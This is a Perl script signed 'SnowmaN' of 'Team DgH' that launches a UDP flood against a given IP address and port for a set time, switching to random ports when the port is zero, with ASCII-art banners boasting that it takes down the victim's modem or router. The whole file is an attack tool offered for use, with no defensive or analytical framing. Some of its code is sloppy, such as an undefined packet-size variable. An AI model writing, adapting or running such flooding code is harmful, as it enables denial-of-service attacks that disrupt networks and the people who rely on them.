#!/usr/bin/perl


#########################################################
#                         ''~``                         #
#                        ( o o )                        #
#+------------------.oooO--(_)--Oooo.------------------+#
#|                     DgHBySnowmaN                    |#
#|                    .oooO  Skype: OhSMHSnowmaN       |#
#|                    (   )   Oooo.                    |#
#+---------------------\ (----(   )--------------------+#
#                       \_)    ) /                      #
#                             (_/                       #
#########################################################

use Socket;

$ARGC=@ARGV;

if ($ARGC !=3) {
 printf "To initiate a UDP Flood\n";
 printf "perl $0 ip port time\n";
 printf "Coded by SnowmaN\n";
 printf "Team DgH is Running 2015\n";
 exit(1);
}

my ($ip,$port,$size,$time);
 $ip=$ARGV[0];
 $port=$ARGV[1]; 
 $time=$ARGV[2];

socket(crazy, PF_INET, SOCK_DGRAM, 17);
    $iaddr = inet_aton("$ip");

print <<EOTEXT;

 UUUUUUUU     UUUUUUUUDDDDDDDDDDDDD      PPPPPPPPPPPPPPPPP   
 U::::::U     U::::::UD::::::::::::DDD   P::::::::::::::::P  
 U::::::U     U::::::UD:::::::::::::::DD P::::::PPPPPP:::::P 
 UU:::::U     U:::::UUDDD:::::DDDDD:::::DPP:::::P     P:::::P
  U:::::U     U:::::U   D:::::D    D:::::D P::::P     P:::::P
  U:::::D     D:::::U   D:::::D     D:::::DP::::P     P:::::P
  U:::::D     D:::::U   D:::::D     D:::::DP::::PPPPPP:::::P 
  U:::::D     D:::::U   D:::::D     D:::::DP:::::::::::::PP  
  U:::::D     D:::::U   D:::::D     D:::::DP::::PPPPPPPPP    
  U:::::D     D:::::U   D:::::D     D:::::DP::::P            
  U:::::D     D:::::U   D:::::D     D:::::DP::::P            
  U::::::U   U::::::U   D:::::D    D:::::D P::::P            
  U:::::::UUU:::::::U DDD:::::DDDDD:::::DPP::::::PP          
   UU:::::::::::::UU  D:::::::::::::::DD P::::::::P          
     UU:::::::::UU    D::::::::::::DDD   P::::::::P          
       UUUUUUUUU      DDDDDDDDDDDDD      PPPPPPPPPP

EOTEXT
print <<EOTEXT;
                 .:: UDP Flood Sent Successfully ::.
               DgH By SnowmaN On Port 53 Random. Get @ Me.


EOTEXT
printf "~SnowmaN RuNz Your Modem/Router!~ $ip on port $port\n";

if ($ARGV[1] ==0 && $ARGV[2] ==0) {
 goto randpackets;
}
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
 system("(sleep $time;killall -9 udp) &");
 goto packets;
}
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
 goto packets;
}
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
 system("(sleep $time;killall -9 udp) &"); 
 goto randpackets;
}

packets:
for (;;) {
 $size=$rand x $rand x $rand;
 send(crazy, 0, $size, sockaddr_in($port, $iaddr));
} 

randpackets:
for (;;) {
 $size=$rand x $rand x $rand;
 $port=int(rand 65000) +1;
 send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}